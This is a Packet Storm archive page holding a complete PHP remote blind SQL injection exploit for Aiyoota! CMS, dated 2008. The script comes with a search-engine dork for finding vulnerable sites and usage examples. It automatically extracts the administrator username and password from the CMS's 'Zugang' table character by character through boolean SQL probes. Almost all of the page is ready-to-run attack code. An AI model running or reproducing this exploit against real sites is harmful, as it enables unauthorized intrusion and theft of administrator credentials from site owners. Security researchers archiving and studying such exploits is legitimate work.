what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Aiyoota! CMS SQL Injection

Aiyoota! CMS SQL Injection
Posted Dec 16, 2008
Authored by Lidloses_Auge

Aiyoota! CMS remote blind SQL injection exploit.

tags | exploit, remote, sql injection
SHA-256 | 5fe1f519e4f3e8d6131052331a1e2520afba7ff252c5e3d08ca8a8fedffe9878

Aiyoota! CMS SQL Injection

Change Mirror Download
<?php
ini_set("max_execution_time",0);
ini_set('user_agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');
print_r('
###############################################################
#
# Aiyoota! CMS - Blind SQL Injection Exploit
#
# Vulnerability discovered by: Lidloses_Auge
# Exploit coded by: Lidloses_Auge
# Greetz to: -=Player=- , Suicide, g4ms3, enco,
# Palme, GPM, Free-Hack
# Date: 16.12.2008
#
###############################################################
#
# Dork: inurl:naviid + inurl:liste9
# Admin Panel: [Target]/cms/
# Usage (Method 1 auto): php '.$argv[0].' -1 [Target]
# Usage (Method 2 manually): php '.$argv[0].' -2 [Target] [Language] [valid naviID] [ueber] [aiyootaID] [file]
# Example (Method 1) for http://www.site.com
# => php '.$argv[0].' -1 http://www.site.com
# Example (Method 2) for http://www.site.com/english/8/8/45001/liste9.html
# => php '.$argv[0].' -2 http://www.site.com english 8 8 45001 liste9.html
#
###############################################################
');
$automatic = $argv[1];
$url = $argv[2];
if (($argv[1] == "-1" | $argv[1] == "-2") & ($argc == 3 | $argc == 8)) {
if ($argv[1] == "-1") {
$source = file_get_contents($url."/index.html");
$buffer = $source;
if (strpos($source,"a href='$url/") != 0) {
$place = strpos($source,"a href='$url/");
$sprache = substr($source,$place+8+strlen($url)+1,strpos(substr($source,$place+8+strlen($url)+1),"/"));
$urlpart = substr($source,$place+8,strpos(substr($source,$place+8),"'"));
} else {
while (substr($buffer,strpos($buffer,"a href='/")+9,3) == "cms") {
$buffer = substr($buffer,strpos($buffer,"a href='/"));
}
$place = strpos($buffer, "a href='/");
$sprache = substr($buffer,$place+9,strpos(substr($buffer,$place+9),"/"));
$urlpart = $url."/".substr($buffer,$place+9,strpos(substr($buffer,$place+9),"'"));
}
$varstart = strpos($urlpart,$sprache)+strlen($sprache)+1;
$injplace = strpos(substr($urlpart,$varstart),"/") + $varstart;
$part1 = substr($urlpart,0,$injplace);
$part2 = substr($urlpart,$injplace);
} elseif ($argv[1] == "-2") {
$part1 = $url."/".$argv[3]."/".$argv[4];
$part2 = "/".$argv[5]."/".$argv[6]."/".$argv[7];
}
echo "\nExploiting now!\n\n";
$true = file_get_contents($part1."+and+1=1".$part2);
$false = file_get_contents($part1."+and+1=0".$part2);
$inj = $false;
$tbl = array("benutzer","passwort");
if (strlen($false) != strlen($true)) {
for ($mode = 0; $mode <= 1; $mode++) {
echo $tbl[$mode].": ";
while ($break == 0) {
$count++;
$injpart1 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))>96".$part2);
$injpart2 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))>108".$part2);
$injpart3 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))<=96".$part2);
$injpart4 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))<70".$part2);
$injpart5 = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))<58".$part2);
if (strlen($false) / strlen($injpart1) * 100 < 98) {
if (strlen($false) / strlen($injpart2) * 100 < 98) {
$border1 = 103;
$border2 = 122;
} else {
$border1 = 96;
$border2 = 108;
}
}
if (strlen($false) / strlen($injpart3) * 100 < 98) {
if (strlen($false) / strlen($injpart4) * 100 < 98) {
if (strlen($false) / strlen($injpart5) * 100 < 98) {
$border1 = 47;
$border2 = 57;
} else {
$border1 = 59;
$border2 = 69;
}
} else {
$border1 = 70;
$border2 = 96;
}
}
for ($i = $border1; $i<=$border2; $i++) {
$zero = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))=0".$part2);
if (strlen($false) / strlen($zero) * 100 < 98) {
$break = 1;
echo "\n";
$i = $border2+1;
} else {
$inj = file_get_contents($part1."+and+ascii(substring((select+$tbl[$mode]+from+Zugang+limit+0,1),$count,1))>$i".$part2);
if ((strlen($inj) / strlen($true) * 100) < 98) {
echo chr($i);
$i = $border2+1;
}
}
}
}
$break = 0;
$count = 0;
}
}
} else {
echo "\nOoops, you did a mistake. Correct count of arguments? Correct Method?\n";
}
?>


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close